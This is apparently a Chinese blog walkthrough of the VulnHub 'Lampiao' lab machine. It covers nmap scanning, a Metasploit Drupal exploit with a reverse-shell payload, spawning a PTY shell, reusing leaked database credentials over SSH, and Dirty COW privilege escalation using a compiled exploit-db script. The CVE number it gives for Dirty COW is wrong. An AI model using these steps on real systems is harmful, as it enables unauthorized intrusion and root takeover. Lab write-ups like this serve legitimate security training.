您当前的位置: 首页 > 

ThnPkm

暂无认证

  • 12浏览

    0关注

    98博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

VulnHub — Lampiao

ThnPkm 发布时间:2022-09-09 20:00:34 ,浏览量:12

信息收集  msfconsole    脏牛提权

 

目录

信息收集

扫描ip和端口

访问web 扫描目录

漏洞发发现与利用 

msfconsole 使用 

python命令进入交互模式

寻找配置信息 (找用户密码)

脏牛提权

信息收集 扫描ip和端口

namp -sP 扫描网段 ,得到靶机ip  

 利用nmap的TCP半开放扫描,对网站端口进行快速探测

nmap -sS -p 1-65535 192.168.164.135

该扫描方式因为它不打开一个完全的TCP连接,所以是使用频率最高的扫描方式。扫描结果发现开放22、80、1898端口

可以通过-A  来详细扫描, -p扫描所有的端口 ,时间长一点

nmap -A 192.168.164.133 -p 0-65535

可以看到1898端口也是http服务

访问web 扫描目录

继续收集信息, 在1898 端口有页面

80端口没有啥有用功能,在1898 端口 扫目录

 

得到框架的版本信息 Drupal 7.54 

漏洞发发现与利用  msfconsole 使用 
1.搜索利用脚本: search
2.进入利用脚本: use exploit/unix/ftp/proftpd_133c_backdoor
3.查看需要设置的参数: show options
4.设置参数: set rhost 192.168.1.4
5.设置payload: set payload cmd/unix/reverse
6.查看payload需要设置的参数: show options
7.设置payload参数:set rhost 192.168.1.4
8.输入命令: run, 执行攻击,成功getshell, 井且直接为root权限

1,搜索脚本 search  

2,利用脚本 use 

3,查看需要参数 show options

 用18年的exp 就use 4 ,然后查看参数,yse就是需要设置的

4,设置参数 set

5,run 执行

输入shell 连接上 

python命令进入交互模式
python -c 'import pty;pty.spawn("/bin/bash")'

寻找配置信息 (找用户密码)

 找到数据库信息,密码

 找账号 发现一个tiago 

ssh连接尝试 

用数据库密码成功连接上 

脏牛提权-法1

cve-2016-5159

影响:Linux内核版本大于2.6.22版本 (2007年发行,到2016年10月18日修复) 低权限的用户可利用这一漏洞在本地进行提权

接下来进行提权,首先查看下内核版本:uname -a

版本符合

在Kali中自带脏牛的脚本文件,searchsploit dirty,找到需要的文件路径

返回取得Shell的终端,按【Ctrl】+【C】返回meterpreter的session会话上传cpp文件到/tmp目录下,因为该目录一般是所有用户都具有可读可写权限

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

 上传后再进入www-data的权限下,对cpp文件进行编译:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o re /tmp/40847.cpp -lutil
-Wall
允许发出gcc能提供的所有有用的警告,也可以用 -W (warning) 来标记指定的警告

-pedantic
允许发出 ANSI/ISO C 标准所列出的所有警告

-ON
指定代码优化的级别为 N , o  dcow.tar.gz 

在本机上向靶机发送  压缩好的文件 端口4444

nc 192.168.164.135 4444 < dcow.tar.gz 

靶机上收到压缩包,进行解压 tar -xvf

解压得到脏牛脚本 

然后通过目录找到脚本

使用make命令 即可运行 

make完后 发现多了一个dcow文件 ,运行dcow 就提权成功

 

关注
打赏
1660722558
查看更多评论
立即登录/注册

微信扫码登录

0.0721s